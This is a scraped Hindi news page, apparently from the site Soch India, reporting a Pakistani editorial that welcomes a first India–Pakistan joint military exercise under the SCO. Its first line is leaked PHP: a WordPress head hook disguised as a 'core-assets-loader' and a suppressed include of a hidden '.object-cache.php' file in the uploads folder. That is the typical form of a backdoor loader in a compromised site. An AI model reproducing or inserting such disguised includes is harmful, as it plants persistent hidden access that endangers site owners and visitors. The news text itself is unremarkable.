add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ऐतिहासिक! आज़ादी के बाद पहली बार ज्वाइंट मिलिट्री एक्सरसाइज़ करने जा रहे हैं भारत-पाकिस्तान – SOCH INDIA
Menu

दुनिया
ऐतिहासिक! आज़ादी के बाद पहली बार ज्वाइंट मिलिट्री एक्सरसाइज़ करने जा रहे हैं भारत-पाकिस्तान

nobanner

पाकिस्तान के एक प्रमुख अखबार ने सराहना करते हुए यह बात कही भारतीय और पाकिस्तान के सैनिकों के बीच होने वाले संयुक्त सैन्य अभ्यास नई दिल्ली और इस्लामाबाद के रिश्तों में सुधार के सबसे बड़े उदाहरण के तौर पर देखा जा रहा है. द नेशन ने अपने संपादकीय में कहा कि यह अभ्यास शंघाई सहयोग संगठन (एससीओ) की रूपरेखा के तहत किया जाएगा.

सन् 1947 में आजादी मिलने के बाद ऐसा पहली बार हो रहा है जब दोनों देशों की सेनाएं साथ मिलकर ज्वाइंट मिलिट्री एक्सरसाइज़ करेंगी. संपादकीय में नियंत्रण रेखा पर कथित सीज़फायर उल्लंघन के कारण दोनों देशों के बीच दुश्मनी को समाप्त करने के लिए इस पहल का स्वागत किया है.

संपादकीय में कहा गया, “सीमा मामलों के मैनेजमेंट के लिए सूत्र पर नजर रखने के साथ अभ्यास का मकसद विश्वास और आम समझ विकसित करना है, ताकि दो “कट्टरपंथी” पड़ोसी इस क्षेत्र में अपने कमजोर संबंधों को बेहतर बनाने के लिए आगे बढ़ाने के लिए प्रयास करें.”

संपादकीय में कहा गया कि इस समय जब दो कोरियाई देश प्रायद्वीप को परमाणु मुक्त बनाने के लिए सहमत हो गए हैं तो वास्तव में पाकिस्तान-भारत के साथ आने का विचार सपने की बात नहीं हो सकता.